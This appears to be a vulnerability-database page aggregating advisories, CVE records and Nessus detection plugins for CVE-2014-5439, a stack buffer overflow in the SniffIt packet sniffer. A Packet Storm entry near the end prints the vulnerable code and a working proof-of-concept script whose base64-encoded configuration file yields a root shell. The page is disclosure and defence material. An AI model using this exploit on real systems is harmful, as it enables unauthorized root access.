SniffIt vulnerability

2020-11-30T00:00:00

Description

## Releases * Ubuntu 16.04 ESM ## Packages * sniffit \- packet sniffer and monitoring tool It was discovered that SniffIt incorrectly handled certain configuration files. An attacker could possibly use this issue to execute arbitrary code.

Affected Package

OS	OS Version	Package Name	Package Version
Ubuntu	16.04	sniffit	0.3.7.beta-19ubuntu0.1
Ubuntu	16.04	sniffit-dbgsym	0.3.7.beta-19ubuntu0.1

{"securityvulns": [{"lastseen": "2018-08-31T11:09:58", "description": "Buffer overflow in configuration file.", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-12-01T00:00:00", "type": "securityvulns", "title": "sniffit buffer overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14114", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:55", "description": "\r\nCVE-2014-5439 - Root shell on Sniffit\r\n\r\nSniffit is a packet sniffer and monitoring tool.\r\n\r\nThe attacker can create a specially-crafted sniffit configuration file, which is able\r\nto bypass all three protection mechanisms:\r\n\r\n - Non-eXecutable bit NX\r\n - Stack Smashing Protector SSP\r\n - Address Space Layout Randomisation ASLR\r\n\r\nAnd execute arbitrary code with root privileges.\r\n\r\nExploit, fix and discussion in:\r\n\r\nhttp://hmarco.org/bugs/CVE-2014-5439-sniffit_0.3.7-stack-buffer-overflow.html\r\n\r\n\r\nRegards,\r\nHector Marco.\r\nhttp://hmarco.org\r\n\r\nCybersecurity researcher at:\r\nhttp://cybersecurity.upv.es/\r\n\r\n\r\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-12-01T00:00:00", "type": "securityvulns", "title": "CVE-2014-5439 - Root shell on Sniffit [with exploit]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31415", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31415", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-08-19T12:10:49", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-4652-1 advisory.\n\n - Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted configuration file that will bypass Non-eXecutable bit NX, stack smashing protector SSP, and address space layout randomization ASLR protection mechanisms, which could let a malicious user execute arbitrary code.\n (CVE-2014-5439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-01T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : SniffIt vulnerability (USN-4652-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5439"], "modified": "2020-12-03T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:sniffit"], "id": "UBUNTU_USN-4652-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143375", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4652-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143375);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/03\");\n\n script_cve_id(\"CVE-2014-5439\");\n script_bugtraq_id(71318);\n script_xref(name:\"USN\", value:\"4652-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : SniffIt vulnerability (USN-4652-1)\");\n script_summary(english:\"Checks the dpkg output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the\nUSN-4652-1 advisory.\n\n - Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted\n configuration file that will bypass Non-eXecutable bit NX, stack smashing protector SSP, and address space\n layout randomization ASLR protection mechanisms, which could let a malicious user execute arbitrary code.\n (CVE-2014-5439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4652-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sniffit package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-5439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sniffit\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'sniffit', 'pkgver': '0.3.7.beta-19ubuntu0.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sniffit');\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:38:53", "description": "It was discovered that there was a buffer overflow in the packet sniffer and monitoring tool 'sniffit' which allowed a specially crafted configuration file to provide a root shell.\n\nFor Debian 7 'Wheezy', this issue has been fixed in sniffit version 0.3.7.beta-16.1+deb7u1.\n\nWe recommend that you upgrade your sniffit packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-22T00:00:00", "type": "nessus", "title": "Debian DLA-713-1 : sniffit security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5439"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:sniffit", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-713.NASL", "href": "https://www.tenable.com/plugins/nessus/95029", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-713-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95029);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5439\");\n script_bugtraq_id(71318);\n\n script_name(english:\"Debian DLA-713-1 : sniffit security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that there was a buffer overflow in the packet\nsniffer and monitoring tool 'sniffit' which allowed a\nspecially crafted configuration file to provide a root shell.\n\nFor Debian 7 'Wheezy', this issue has been fixed in sniffit version\n0.3.7.beta-16.1+deb7u1.\n\nWe recommend that you upgrade your sniffit packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/11/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/sniffit\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected sniffit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sniffit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"sniffit\", reference:\"0.3.7.beta-16.1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:44:43", "description": "Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted configuration file that will bypass Non-eXecutable bit NX, stack smashing protector SSP, and address space layout randomization ASLR protection mechanisms, which could let a malicious user execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-19T16:15:00", "type": "cve", "title": "CVE-2014-5439", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2020-08-18T15:05:00", "cpe": ["cpe:/a:sniffit_project:sniffit:0.3.7", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2014-5439", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5439", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sniffit_project:sniffit:0.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2022-11-24T06:07:04", "description": "Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit prior to 0.3.7 via a crafted configuration file that will bypass Non-eXecutable bit NX, stack smashing protector SSP, and address space layout randomization ASLR protection mechanisms, which could let a malicious user execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-19T16:15:00", "type": "debiancve", "title": "CVE-2014-5439", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2019-11-19T16:15:00", "id": "DEBIANCVE:CVE-2014-5439", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5439", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:12:42", "description": "\nIt was discovered that there was a buffer overflow in the packet sniffer and\nmonitoring tool sniffit which allowed a specially-crafted configuration file\nto provide a root shell.\n\n\nFor Debian 7 Wheezy, this issue has been fixed in sniffit version\n0.3.7.beta-16.1+deb7u1.\n\n\nWe recommend that you upgrade your sniffit packages.\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-21T00:00:00", "type": "osv", "title": "sniffit - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2022-07-21T05:54:44", "id": "OSV:DLA-713-1", "href": "https://osv.dev/vulnerability/DLA-713-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-23T21:46:34", "description": "Package : sniffit\nVersion : 0.3.7.beta-16.1+deb7u1\nCVE ID : CVE-2014-5439\nDebian Bug : 845122\n\nIt was discovered that there was a buffer overflow in the packet sniffer and\nmonitoring tool "sniffit" which allowed a specially-crafted configuration file\nto provide a root shell.\n\nFor Debian 7 "Wheezy", this issue has been fixed in sniffit version\n0.3.7.beta-16.1+deb7u1.\n\nWe recommend that you upgrade your sniffit packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. `'` lamby@debian.org / chris-lamb.co.uk\n `-", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-11-21T08:47:40", "type": "debian", "title": "[SECURITY] [DLA 713-1] sniffit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2016-11-21T08:47:40", "id": "DEBIAN:DLA-713-1:3CD42", "href": "https://lists.debian.org/debian-lts-announce/2016/11/msg00020.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-01-26T14:17:18", "description": "Multiple Stack-based Buffer Overflow vulnerabilities exists in Sniffit\nprior to 0.3.7 via a crafted configuration file that will bypass\nNon-eXecutable bit NX, stack smashing protector SSP, and address space\nlayout randomization ASLR protection mechanisms, which could let a\nmalicious user execute arbitrary code.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | sniffit is not setuid, so this issue only affects configurations where a user is only permitted to run a subset of administrative (e.g. using a sudo configuration that only allows a user to run sniffit).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-19T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5439", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5439"], "modified": "2019-11-19T00:00:00", "id": "UB:CVE-2014-5439", "href": "https://ubuntu.com/security/CVE-2014-5439", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:02", "description": "", "cvss3": {}, "published": "2014-11-27T00:00:00", "type": "packetstorm", "title": "Sniffit Root Shell", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-5439"], "modified": "2014-11-27T00:00:00", "id": "PACKETSTORM:129292", "href": "https://packetstormsecurity.com/files/129292/Sniffit-Root-Shell.html", "sourceData": "`CVE-2014-5439 - Root shell on Sniffit \nAuthors: Ismael Ripoll & Hector Marco \nCVE: CVE-2014-5439 \nDates: July 2014 - Discovered the vulnerability \n \nDescription \n \nSniffit is a packet sniffer and monitoring tool. A bug in sniffit prior to 0.3.7 has been found. The bug is caused by an incorrect implementation of the functions clean_filename() and clean_string() which causes a stack buffer overflow when parsing a configuration file with \"long\" paths (more than 20 characters). \n \nThe attacker can to create a specially-crafted sniffit configuration file, which is able to bypass all three protection mechanisms: \n \nNon-eXecutable bit NX \nStack Smashing Protector SSP \nAddress Space Layout Randomisation ASLR \n \nAnd execute arbitrary code with root privileges (the id of the user that launches the sniffit). \n \nThe new issue has been assigned CVE-2014-7169. \n \nThe presented PoC successfully exploits the vulnerability. \n \n \nImpact \n \nTo use the sniffit, the application need to be executed with root privileges. Typically by sudo or pkexec or setting the UID bit. Since this tool requires this privilege to execute the sniffer, only allowing to a user execute the sniffer is enough to execute commands as root. \n \n \n \nVulnerable packages \n \nThe sniffit 0.3.7 and prior are affected. Currently, this tool is in the universe repository installable via apt-get install sniffit. For example, the sniffit is available on Ubuntu 14.04.1 LTS and prior. \n \n \n \nVulnerability \n \nThe vulnerability is caused due to incorrect implementation of the functions clean_filename() and clean_string(). These functions suffer from a stack buffer overflow. \n \nThe bug appears in file sn_cfgfile.c on the following functions: \n \nchar *clean_string (char *string) { \nchar help[20]; \nint i, j; \nj=0; \nfor (i=0;i<strlen(string);i++) { \nif( (isalnum(string[i]))||(string[i]=='.') ) { \nhelp[j]=string[i]; \nhelp[j+1]=0; \n} \nj++; \n} \nstrcpy(string, help); \nreturn string; \n} \n \nchar *clean_filename (char *string) { \nchar help[20]; \nint i, j; \nj=0; \nfor (i=0;i<strlen(string);i++) { \nif( !(iscntrl(string[i])) && !(isspace(string[i])) ) { \nhelp[j]=string[i]; \nhelp[j+1]=0; \n} \nj++; \n} \nstrcpy(string, help); \nreturn string; \n} \n \n \n \n \nExploit (PoC) \n \nI have built an exploit to bypass the three most popular protections techniques: Non-eXecutable bit NX, Stack Smashing Protector SSP and Address Space Layout Randomisation ASLR. The exploit finally obtains a root shell. The exploit was successfully tested with Ubuntu 14.04.1 LTS (trusty) with kernel 3.13.0-32-generic (x86_64) fully updated. \n \nThe sniffit exploit is a shell script which will creates a specially-crafted configuration file \"exploit-sniffit-0.3.7-shell.cfg\". Passing this configuration file to sniffit through the \"-c\" option we will obtain a root shell. \n \n---- start exploit-sniffit-0.3.7-shell.sh exploit ---- \n \ncfgfile=' \nbG9nZmlsZSAvL2Jpbi9zaApsb2dmaWxlIIiIiIiIiIiImZmZmZmZmZmqqqqqqqqqqgYGBgYGBgYG \nQUFBQUFBQUEHBwcHBwcHB0NDQ0NDQ0NDRERERERERERFRUVFRUVFRUZGRkZGRkZGR0dHR0dHR0dJ \nP0AGBgYGBiH8YAYGBgYGKzxABgYGBgYh/GAGBgYGBtWbQAYGBgYGCkV4cGxvaXQgYnkgSGVjdG9y \nIE1hcmNvIDxobWFyY29AaG1hcmNvLm9yZz4KaHR0cDovL2htYXJjby5vcmcK' \n \necho \"\" \necho \"-----------------------=======-------------------------\" \necho \"----------------=======================----------------\" \necho \"\" \necho \" Author: Hector Marco-Gisbert <hmarco@hmarco.org>\" \necho \" Website: http://hmarco.org\" \necho \" Comment: Exploit for sniffit <= 0.3.7 (root shell)\" \necho \"\" \necho \"----------------=======================----------------\" \necho \"-----------------------=======-------------------------\" \necho \"\" \n \necho \"[+] Creating crafted configuration file for sniffit ...\" \necho \"${cfgfile}\" | base64 -d > exploit-sniffit-0.3.7-shell.cfg \necho -e \"\\n[+] File exploit-sniffit-0.3.7-shell.cfg successfully created !\" \n \necho \"\" \necho \"[+] Help:\" \necho \" If your sniffit is installed with the Set-User-ID then execute:\" \necho \" $ sniffit -c exploit-sniffit-0.3.7-shell.cfg\" \necho \"\" \necho \" If your are allowed to to execute the sniffit with sudo then execute:\" \necho \" $ sudo sniffit -c exploit-sniffit-0.3.7-shell.cfg\" \necho \"\" \n \n---- end exploit-sniffit-0.3.7-shell.sh exploit ---- \n \n \nObtaining a root shell: \n \nbox@upv.es:~$ id \nuid=1000(box) gid=1000(box) groups=1000(box) \nbox@upv.es:~$ sniffit -c exploit-sniffit-shell.cfg \n# \n# id \nuid=1000(box) gid=1000(box) euid=0(root) groups=1000(box) \n \n \nFIX \n \nThe following is a simple patch which fixes the bug. Patch for sniffit 0.3.7: \n \ndiff -Nurp sniffit-0.3.7.beta/sn_cfgfile.c sniffit-0.3.7.beta-mod/sn_cfgfile.c \n--- 